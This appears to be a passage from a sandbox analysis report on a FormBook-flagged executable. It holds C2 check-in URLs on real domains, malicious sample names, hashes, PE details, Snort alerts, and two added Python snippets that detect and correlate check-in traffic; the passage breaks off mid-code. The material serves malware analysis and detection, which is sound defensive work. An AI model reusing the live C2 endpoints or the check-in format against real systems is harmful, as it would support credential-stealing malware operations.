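    "www.ondemandbarbering.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=/uLN5+r26Ut57xPIqOKXvxUOX9d2FCRa7emcxJmdJbT2O6P9vjLLh6WVqqzX35c/Z5WpvQjWxQ==",
    "www.exlineinsurance.com/bw82/?-Zw=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp6GDrJeBiJjd&2db=X48HMfxHw",
    "www.kraftwater.com/mt6e/?mrj8Pz0x=0RCBTiN8QMZ3oE+VZNAduiGa6QD3EueGCqCZYSkGkB1UoSFwHRxlmL9dOF6U9iMf3iVa6g==&8pXxsd=pFN4nj8XVNlXNFt",
    "www.thegreenlittlebuddha.com/mt6e/?rVXHzf=lnRpL0YpGPdD&mtxhc=h01RVnm9BON1opxkvERnI/Kb//o30GygCVhF9Qg5er/US/k4YrCTLYC3XqAKD1mSWelEgaOvhw==",
]

# Constructed negative case: a multi-segment path with a single query parameter.
BENIGN_URL = "www.example.com/news/2021/02/25/index.html?utm_source=newsletter"

# Heuristic thresholds (assumptions for this example): a check-in path is a
# single short alphanumeric directory, and the payload parameter is a long
# base64-like value. The short-id parameter is not length-checked.
PATH_TOKEN = re.compile(r"^[A-Za-z0-9]{2,6}$")
B64ISH = re.compile(r"^[A-Za-z0-9+/_-]+={0,2}$")
MIN_BLOB_LEN = 40


def parse_checkin(url):
    """Return (host, path_token, [(key, value), ...]) or None.

    The query is split by hand rather than with parse_qsl so that '+' and '/'
    inside the base64-like blob survive untouched.
    """
    if "://" not in url:
        url = "http://" + url  # urlsplit needs a scheme to find the host
    parts = urlsplit(url)
    token = parts.path.strip("/")
    if not parts.hostname or not parts.query or not PATH_TOKEN.match(token):
        return None
    params = []
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        params.append((key, value))
    return parts.hostname, token, params


def looks_like_formbook_checkin(url):
    """True when the URL has the two-parameter, one-long-blob check-in shape."""
    parsed = parse_checkin(url)
    if parsed is None:
        return False
    _, _, params = parsed
    if len(params) != 2:
        return False
    blobs = [v for _, v in params if len(v) >= MIN_BLOB_LEN and B64ISH.match(v)]
    return len(blobs) == 1  # exactly one payload blob, the other is the short id


def pivot_by_path_token(urls):
    """Group hosts by the path token of every URL that passes the shape test."""
    groups = defaultdict(set)
    for url in urls:
        if looks_like_formbook_checkin(url):
            host, token, _ = parse_checkin(url)
            groups[token].add(host)
    return {token: sorted(hosts) for token, hosts in groups.items()}


if __name__ == "__main__":
    for token, hosts in sorted(pivot_by_path_token(CONTEXT_URLS).items()):
        print(f"{token}: {', '.join(hosts)}")
    print("benign URL flagged:", looks_like_formbook_checkin(BENIGN_URL))
```

Run against the seven URLs above, the pivot puts four hosts under bw82, two under mt6e and one under 8zdn; the same grouping over a larger feed is a quick way to find hosts that belong to one campaign even when their names, registrars and hosting ASNs differ. The shape test is deliberately loose and should be treated as a triage filter, not a signature.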

                                                                                  Domains

Match / Associated Sample Name (Detection) / Context

parkingpage.namecheap.com
  00113221.xlsx (malicious) • 198.54.117.215
  Order83930.exe (malicious) • 198.54.117.210
  AWB-INVOICE_PDF.exe (malicious) • 198.54.117.217
  eInvoice.exe (malicious) • 198.54.117.215
  IMG_7742_Scanned.doc (malicious) • 198.54.117.218
  zMJhFzFNAz.exe (malicious) • 198.54.117.218
  PO 20211602.xlsm (malicious) • 198.54.117.210
  Smart Tankers Qoute no. 2210.xlsx (malicious) • 198.54.117.210
  InterTech_Inquiry.exe (malicious) • 198.54.117.218
  Swift_Payment_jpeg.exe (malicious) • 198.54.117.211
  quotations pdf.exe (malicious) • 198.54.117.217
  Purchase Order _pdf.exe (malicious) • 198.54.117.216
  NNFYMCVABc.exe (malicious) • 198.54.117.215
  AANK5mcsUZ.exe (malicious) • 198.54.117.217
  NWvnpLrdx4.exe (malicious) • 198.54.117.210
  00278943.xlsx (malicious) • 198.54.117.218
  PO 213409701.xlsx (malicious) • 198.54.117.212
  purchase order doc.exe (malicious) • 198.54.117.211
  PROFOMA INVOICE pdf.exe (malicious) • 198.54.117.217
  PO#4503527426.xlsx (malicious) • 198.54.117.216
td-balancer-dc11-60-102.wixdns.net
  UAE CONTRACT SUPPLY.exe (malicious) • 185.230.60.102
  2S6VUd960E.exe (malicious) • 185.230.60.102
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
  2109.exe (malicious) • 3.138.83.135
  Upit za narudžbinu 02242021.PDFxx.exe (malicious) • 18.189.205.91
  JJux8lxZRj.exe (malicious) • 3.131.252.17
  transferir copia_98087.exe (malicious) • 18.189.205.91
  22 FEB -PROCESSING.xlsx (malicious) • 18.189.205.91
  Order83930.exe (malicious) • 3.131.252.17
  IMG_01670_Scanned.doc (malicious) • 18.189.205.91
  Drawings.xlsm (malicious) • 18.189.205.91
  Shinshin Machinery.exe (malicious) • 3.141.74.7
  CMahQwuvAE.exe (malicious) • 3.18.253.84
  HBL VRN0924588.xlsx (malicious) • 3.141.74.7
  G6FkfjX5Ow.exe (malicious) • 3.14.163.116
  51BfqRtUI9.exe (malicious) • 3.141.74.7
  RFQ 2-16-2021-.exe (malicious) • 3.14.163.116
  Credit card & details.exe (malicious) • 3.14.163.116
  Details!!.exe (malicious) • 3.141.74.7
  Shipping Doc.exe (malicious) • 3.141.74.7
  Purchase Enquiry.exe (malicious) • 3.18.253.84
  b9XV3SOqWlAMBk2.exe (malicious) • 3.14.163.116
  Purchase Order _pdf.exe (malicious) • 3.14.163.116

                                                                                  ASN

Match / Associated Sample Name (Detection) / Context

AMAZON-02US
  SecuriteInfo.com.Variant.Zusy.357020.22720.exe (malicious) • 18.224.172.24
  document-9725971.xls (malicious) • 65.9.88.68
  Tide_v2.49.0_www.9apps.com_.apk (malicious) • 65.9.96.117
  Tide_v2.49.0_www.9apps.com_.apk (malicious) • 65.9.96.131
  C1 PureQuest PO S1026710.xlsm (malicious) • 99.86.159.123
  C1 PureQuest PO S1026710.xlsm (malicious) • 99.86.159.79
  mal.xls (malicious) • 13.126.100.34
  2o0y7CvHF2.exe (malicious) • 3.13.31.214
  mal.xls (malicious) • 13.126.100.34
  C1 PureQuest PO S1026710.xlsm (malicious) • 99.86.159.38
  EmIVSpcKNs.xls (malicious) • 13.250.58.157
  ibne8SNXWv.exe (malicious) • 3.140.184.59
  ibne8SNXWv.exe (malicious) • 3.140.184.59
  PDA BGX00001A DA Query Notification BGX009RE09000001A.xlsx (malicious) • 54.183.132.164
  Order 25th Feb.xlsx (malicious) • 54.67.120.65
  Shipping_Documet.xlsx (malicious) • 54.67.57.56
  1041 Shpg Docs240221.xlsx (malicious) • 54.183.131.91
  RFQ.xlsx (malicious) • 54.67.57.56
  bank slip.xlsx (malicious) • 54.183.132.164
  DRAFT SHIPPING DOCUMENTS.xlsx (malicious) • 54.183.131.91
PUBLIC-DOMAIN-REGISTRYUS
  8zjdEb5sF0.dll (malicious) • 116.206.105.72
  DHLHAWB 57462839.exe (malicious) • 208.91.199.223
  4019223246.exe (malicious) • 208.91.199.224
  data.xls (malicious) • 5.100.152.162
  Swift.jpg.exe (malicious) • 208.91.198.143
  Claim-920537744-02082021.xls (malicious) • 119.18.58.55
  Claim-920537744-02082021.xls (malicious) • 119.18.58.55
  INVOICE-2101-0006N.exe (malicious) • 208.91.199.224
  logs.php.dll (malicious) • 116.206.105.72
  1344-21-03-00079 Q N QUEUE.exe (malicious) • 208.91.198.143
                                                                                  MT SC GUANGZHOU.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.225
                                                                                  HcHimkU72e.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.224
                                                                                  MT WOOJIN CHEMS V.2103.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.225
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 208.91.199.224
                                                                                  AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.224
                                                                                  Document14371.xlsGet hashmaliciousBrowse
                                                                                  • 103.50.162.157
                                                                                  Document14371.xlsGet hashmaliciousBrowse
                                                                                  • 103.50.162.157
                                                                                  AOBO MOULD QUOTATION -1752002.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.223
                                                                                  JKG Eximcon Pvt. Ltd P.O.exeGet hashmaliciousBrowse
                                                                                  • 208.91.198.143
                                                                                  SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                                                                  • 208.91.198.143
                                                                                  GOOGLEUSFB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  dwg.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  DHL_receipt.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  14079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  twistercrypted.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                                                  • 142.250.184.74
                                                                                  tuOAqyHVuH.exeGet hashmaliciousBrowse
                                                                                  • 35.228.227.140
                                                                                  WB4L25Jv37.exeGet hashmaliciousBrowse
                                                                                  • 35.228.227.140
                                                                                  Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                                                  • 142.250.186.106
                                                                                  BL.htmlGet hashmaliciousBrowse
                                                                                  • 142.250.186.33
                                                                                  PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                                                  • 172.217.16.142
                                                                                  PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                                                  • 142.250.186.138
                                                                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                  • 142.250.186.66
                                                                                  dCoLEiYyx1.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  GDJWHqItQO.exeGet hashmaliciousBrowse
                                                                                  • 34.102.136.180
                                                                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                  • 142.250.186.66
                                                                                  2o0y7CvHF2.exeGet hashmaliciousBrowse
                                                                                  • 35.187.82.108
                                                                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                  • 142.250.186.66
                                                                                  kBJlVQuchM.exeGet hashmaliciousBrowse
                                                                                  • 216.239.32.21

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context

37f463bf4616ecd445d4a1937da06e19
8zjdEb5sF0.dll | malicious | 142.250.184.65
Sleaford Medical Group.exe | malicious | 142.250.184.65
UAE CONTRACT SUPPLY.exe | malicious | 142.250.184.65
CustomerStatement.exe | malicious | 142.250.184.65
Payment.html | malicious | 142.250.184.65
EmployeeAnnualReport.exe | malicious | 142.250.184.65
Customer Statement.exe | malicious | 142.250.184.65
Remittance advice.htm | malicious | 142.250.184.65
Customer Statement.exe | malicious | 142.250.184.65
Order-10236587458.exe | malicious | 142.250.184.65
RFQ_110199282773666355627277288.exe | malicious | 142.250.184.65
EMG 3.0.exe | malicious | 142.250.184.65
QUOTATION.xlsx | malicious | 142.250.184.65
VM_629904-26374.htm | malicious | 142.250.184.65
cm0Ubgm8Eu.exe | malicious | 142.250.184.65
caraganas.exe | malicious | 142.250.184.65
Notification 466022.xlsm | malicious | 142.250.184.65
Fax #136.xlsm | malicious | 142.250.184.65
Purchase Order22420.exe | malicious | 142.250.184.65
ceFlxYfe4F.exe | malicious | 142.250.184.65

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  No created / dropped files found

                                                                                  Static File Info

                                                                                  General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.7197215966629225
TrID:
• Win32 Executable (generic) a (10002005/4) 99.15%
• Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 211094.exe
File size: 98304
MD5: a2bc516696c51f3afdd8721d6c782360
SHA1: 2fa5f1d52a9a80b01972cf840b5a3ffffb6be0a4
SHA256: d86226973ffce253c068344a37b83a3e0460cb5331e0d3f0cde729aa62827761
SHA512: 82e5706313cb867c798290a69a672999aa2221af26b094dd0d28a56a033726ecae704d5dc8ad464d1df074cf7569ceb31f206fecd41d65dd2f4acc68dbaeb94f
SSDEEP: 1536:L1bLxrsrdLN6p9posIgfXBMkk3QC4FplR378FLq1XlKmbL:BLqLAp9pokxMgFplR38Y3L
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L....4.Y.................0...P......H........@....@

                                                                                  File Icon

Icon Hash: 10b0b2095489f81e

                                                                                  Static PE Info

                                                                                  General

Entrypoint: 0x401348 (RVA 0x1348, inside .text)
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: (none set: no DYNAMIC_BASE or NX_COMPAT, so the image opts in to neither ASLR nor DEP)
Time Stamp: 0x59AE34C3 [Tue Sep 5 05:23:15 2017 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: c6ebaa5f331077d9c6c3ae892d7a39ce

Entrypoint Preview

Only the first two instructions below are executed code: they are the standard Visual Basic 6 entry stub, which pushes the address of the VB header (0x404268) and calls ThunRTMain in MSVBVM60.DLL (the call target shown is a sandbox-rebased address). The bytes that follow are that header and its data, which the linear disassembly has decoded as meaningless instructions.

Instruction
                                                                                  push 00404268h
                                                                                  call 00007FE96C9BC505h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  xor byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  inc eax
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax-535F8D54h], cl
                                                                                  sub al, ECh
                                                                                  dec edx
                                                                                  stosd
                                                                                  lahf
                                                                                  out dx, al
                                                                                  scasb
                                                                                  mov ch, F3h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add dword ptr [eax], eax
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  push esp
                                                                                  insb
                                                                                  je 00007FE96C9BC582h
                                                                                  insb
                                                                                  jnc 00007FE96C9BC587h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  dec esp
                                                                                  xor dword ptr [eax], eax
                                                                                  and cl, cl
                                                                                  mov esi, 711FD982h
                                                                                  in eax, dx
                                                                                  dec ebp
                                                                                  mov dword ptr [C50604FCh], eax
                                                                                  add dword ptr [esi-22h], edx
                                                                                  mov ch, byte ptr [edi-28C65A66h]
                                                                                  cmp ecx, dword ptr [ebx-48h]
                                                                                  mov ch, FAh
                                                                                  jle 00007FE96C9BC55Fh
                                                                                  jp 00007FE96C9BC4DBh
                                                                                  outsd
                                                                                  cmp cl, byte ptr [edi-53h]
                                                                                  xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                  or al, 00h
                                                                                  stosb
                                                                                  add byte ptr [eax-2Dh], ah
                                                                                  xchg eax, ebx
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  cld
                                                                                  sub eax, 27E00000h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [62724100h], al
                                                                                  push 00000000h
                                                                                  or eax, 46000601h
                                                                                  dec edi
                                                                                  inc ebx
                                                                                  inc ecx
                                                                                  dec esp
                                                                                  dec ecx
                                                                                  add byte ptr [ecx], bl
                                                                                  add dword ptr [eax], eax

                                                                                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x136e4 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x2c72 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x30 | (PE headers, before .text)
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xd8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12af4 | 0x13000 | False | 0.437037417763 | data | 6.2436912522 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x19cc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x2c72 | 0x3000 | False | 0.409423828125 | data | 4.50112626635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x17dca | 0xea8 | data | |
RT_ICON | 0x17522 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051 | |
RT_ICON | 0x16fba | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x16cd2 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467 | |
RT_ICON | 0x16baa | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x16542 | 0x668 | data | |
RT_GROUP_ICON | 0x164e8 | 0x5a | data | |
RT_VERSION | 0x161e0 | 0x308 | data | Chinese | China

Imports

DLL | Import
USER32.DLL | HideCaret
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description | Data
Translation | 0x0804 0x04b0
LegalCopyright | Internal Verify Number,88
InternalName | SKUMLERIERNE
FileVersion | 1.00
CompanyName | Internal Verify Number,88
LegalTrademarks | Internal Verify Number,88
ProductName | Teltplsu
ProductVersion | 1.00
OriginalFilename | SKUMLERIERNE.exe

Possible Origin

Language of compilation system | Country where language is spoken
Chinese | China

This is derived from the version resource's Translation field: 0x0804 is the Windows language ID for Chinese (Simplified, PRC) and 0x04b0 is code page 1200 (Unicode). The version resource is written by whoever built the binary, so it is a weak origin signal on its own.

                                                                                  Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/25/21-15:49:04.064583 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:04.064583 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:04.064583 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:04.204484 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:09.474285 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49749 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:24.992498 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:24.992498 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:24.992498 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:25.133006 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49751 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:30.250902 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 34.98.99.30
02/25/21-15:49:30.250902 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 34.98.99.30
02/25/21-15:49:30.250902 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 34.98.99.30
02/25/21-15:49:30.390222 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.98.99.30 | 192.168.2.6
02/25/21-15:49:35.694806 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 198.54.117.211
02/25/21-15:49:35.694806 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 198.54.117.211
02/25/21-15:49:35.694806 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 198.54.117.211
02/25/21-15:49:41.207811 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.6 | 18.189.205.91
02/25/21-15:49:41.207811 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.6 | 18.189.205.91
02/25/21-15:49:41.207811 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.6 | 18.189.205.91
02/25/21-15:49:46.746673 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 199.79.62.169
02/25/21-15:49:46.746673 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 199.79.62.169
02/25/21-15:49:46.746673 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 199.79.62.169
02/25/21-15:50:03.338770 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 185.230.60.102
02/25/21-15:50:03.338770 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 185.230.60.102
02/25/21-15:50:03.338770 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 185.230.60.102
02/25/21-15:50:14.098751 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49764 | 34.102.136.180 | 192.168.2.6
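
FormBook is documented to work through its configured list of hosts, most of which are decoys, issuing one check-in per host, and that is the shape of the alert table above: three ET signatures fire on each GET, a new destination every few seconds, and some hosts answer 403 Forbidden. Pairing each check-in alert with the response alert on the same client port tells you which servers are live, and the two 403s with no check-in alert on their port (49749 and 49764, both from 34.102.136.180) mark requests that none of the check-in signatures matched. The correlator below is an added example, not part of the report or of Joe Sandbox; its input rows are copied from the table above and trimmed to at most two signatures per check-in, and the SID groupings and the column layout it parses are assumptions of this example.

```python
import re
from collections import OrderedDict
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional, Set, Tuple

# Constructed input: rows from the Snort alert table, trimmed for brevity.
SNORT_ROWS = """
02/25/21-15:49:04.064583 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:04.064583 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:04.204484 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:09.474285 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49749 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:24.992498 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:49:25.133006 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49751 | 34.102.136.180 | 192.168.2.6
02/25/21-15:49:30.250902 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.6 | 34.98.99.30
02/25/21-15:49:30.390222 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.98.99.30 | 192.168.2.6
02/25/21-15:49:35.694806 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 198.54.117.211
02/25/21-15:49:41.207811 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49759 | 80 | 192.168.2.6 | 18.189.205.91
02/25/21-15:49:46.746673 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 199.79.62.169
02/25/21-15:50:03.338770 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49763 | 80 | 192.168.2.6 | 185.230.60.102
02/25/21-15:50:14.098751 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49764 | 34.102.136.180 | 192.168.2.6
"""

CHECKIN_SIDS = {2031412, 2031449, 2031453}   # the three "FormBook CnC Checkin (GET)" rules
RESPONSE_SIDS = {1201}                       # "ATTACK-RESPONSES 403 Forbidden"


@dataclass
class Alert:
    ts: datetime
    sid: int
    msg: str
    sport: int
    dport: int
    src: str
    dst: str


@dataclass
class Flow:
    dst: str
    first_seen: datetime
    sids: Set[int] = field(default_factory=set)   # request-side rules that fired
    http_status: Optional[str] = None             # status seen in a response alert


def parse_alerts(text: str) -> List[Alert]:
    """Parse the pipe-separated alert rows into Alert records."""
    alerts = []
    for line in text.strip().splitlines():
        cols = [c.strip() for c in line.split("|")]
        if len(cols) != 8:
            continue
        ts, _proto, sid, msg, sport, dport, src, dst = cols
        alerts.append(Alert(datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
                            int(sid), msg, int(sport), int(dport), src, dst))
    return alerts


def correlate(alerts: List[Alert]) -> Tuple["OrderedDict", List[Alert]]:
    """Pair request-side alerts with response-side alerts on the same TCP flow.

    Flow key: (client IP, client port, server IP); a response alert carries the
    same fields swapped. A response with no request alert is returned as an
    orphan: the server answered, but no check-in signature fired on the request.
    """
    flows = OrderedDict()
    orphans: List[Alert] = []
    for a in sorted(alerts, key=lambda x: x.ts):
        if a.sid in CHECKIN_SIDS:
            key = (a.src, a.sport, a.dst)
            flows.setdefault(key, Flow(dst=a.dst, first_seen=a.ts)).sids.add(a.sid)
        elif a.sid in RESPONSE_SIDS:
            key = (a.dst, a.dport, a.src)
            m = re.search(r"\b(\d{3})\b", a.msg)      # "403" out of the rule message
            if key in flows:
                flows[key].http_status = m.group(1) if m else "?"
            else:
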